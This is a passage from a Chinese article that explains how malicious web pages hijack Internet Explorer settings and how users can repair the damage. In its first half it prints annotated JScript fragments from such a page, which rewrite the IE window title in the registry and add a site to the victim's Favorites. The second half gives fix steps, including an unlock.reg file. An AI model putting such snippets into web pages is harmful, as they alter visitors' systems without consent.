|
浏览网页注册表被修改之迷及解决办法(6)
注:上面一行是会在窗口中显示出来的文字
注:下面两行代码修改注册表,使受害者所有的IE窗口都加上以下的标题:“呜啦啦…”
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "呜啦啦..."); Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "呜啦啦...");
注:到上面一行为止,完成了对受害者的注册表的所有修改!
注:下面代码用来将其网页增加到受害者的收藏夹中
var WF, Shor, loc; WF = FSO.GetSpecialFolder(0); loc = WF + "\\Favorites"; if(!FSO.FolderExists(loc)) { loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites"; if(!FSO.FolderExists(loc)) { return; } }
注:下面就是使其网页加入到你的收藏夹的具体代码
AddFavLnk(loc, "找到感觉www.findfeel.com", "http://www.findfeel.com");
由于代码很简单,又加了注释,相信你已经看明白是怎么回事了。那么如果不小心进入该网页,并且已经中招了该怎么办呢?别急,下面给你列出了解决的办法。
受害用户的修复方法:
1:对于Win9x用户,建议在电脑启动时按F8键,选择到MS-DOS方式下,使用Scanreg/restore命令来恢复以前备份的、正常的注册表。
2:对于Win2000用户,把以下内容copy下来,存为unlock.reg文件,选带命令行的安全模式,用命令regedit unlock.reg导入,如何,重启机器就OK了。
unlock.reg文件内容如下:
Windows Registry Editor Version 5.00 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] "NoDriveTypeAutoRun"=dword:00000095 "NoRun"=hex: "NoLogOff"=hex: "NoDrives"=dword:00000000 "RestrictRun"=dword:00000000 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] "DisableRegistryTools"=dword:00000000 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] "DisableRegistryTools"=dword:00000000 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp] "Disabled"=dword:00000000 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp] "NoRealMode"=dword:00000000 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon] "LegalNoticeCaption"="" "LegalNoticeText"="" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main] "Window Title"="IE浏览器" [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main] "Window Title"="IE浏览器"
|
